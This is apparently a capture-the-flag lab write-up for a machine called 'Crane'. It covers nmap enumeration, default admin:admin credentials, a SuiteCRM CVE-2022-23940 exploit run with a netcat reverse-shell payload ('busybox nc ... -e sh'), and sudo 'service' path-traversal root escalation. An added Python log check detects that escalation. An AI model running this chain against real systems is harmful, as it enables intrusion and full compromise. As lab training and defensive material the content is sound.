Crane

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p- -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP

Services:

Discovered open port 22/tcp on 192.168.156.146
Discovered open port 3306/tcp on 192.168.156.146
Discovered open port 80/tcp on 192.168.156.146

SuiteCRM

admin:admin
💡 If creds don’t work, try them again

Googled version, found PoC

python3 exploit.py -h http://192.168.156.146 --payload 'busybox nc 192.168.45.171 22 -e sh' 
Username> : admin
Password> : 
INFO:CVE-2022-23940:Login did work - Trying to create scheduled report

local

a85831cf76ed3058f142d31ba7357fb7
sudo -l
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/service

GTFOBins

sudo /usr/sbin/service ../../../../bin/bash

That's root
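A defender-side check for the sudo rule above, added here as an example and not part of the original notes: it scans sudo log lines for `service` calls whose service name resolves outside the init script directory. The log lines are constructed samples, and `INIT_DIR` assumes `service` looks names up under `/etc/init.d`.

```python
import posixpath
import re
import shlex

INIT_DIR = "/etc/init.d"  # assumption: directory service(8) resolves names under

# Constructed sample lines in sudo's syslog format (not from the original page).
SAMPLE_LOG = """\
Jan 10 10:01:12 host sudo: www-data : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/service apache2 restart
Jan 10 10:02:40 host sudo: www-data : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/service ../../../../bin/bash
Jan 10 10:03:05 host sudo: deploy : TTY=pts/1 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/systemctl status mysql
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)


def resolved_target(name):
    """Path a service name resolves to when joined onto INIT_DIR."""
    return posixpath.normpath(posixpath.join(INIT_DIR, name))


def find_service_escapes(log_text):
    """Return (user, runas, resolved_path) for each sudo'd service call
    whose service name resolves outside INIT_DIR."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        argv = shlex.split(m["cmd"])
        # Only look at the service wrapper, and only when a name was given.
        if len(argv) < 2 or posixpath.basename(argv[0]) != "service":
            continue
        target = resolved_target(argv[1])
        if not target.startswith(INIT_DIR + "/"):
            hits.append((m["user"], m["runas"], target))
    return hits


if __name__ == "__main__":
    for user, runas, target in find_service_escapes(SAMPLE_LOG):
        print(f"ALERT: {user} ran service as {runas}; name resolves to {target}")
```

The sudoers rule shown by `sudo -l` places no limit on the arguments to `/usr/sbin/service`; listing the exact service names and actions in the rule removes the escape this check looks for.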

proof

4cea78830ce246f0c7757708228c42e7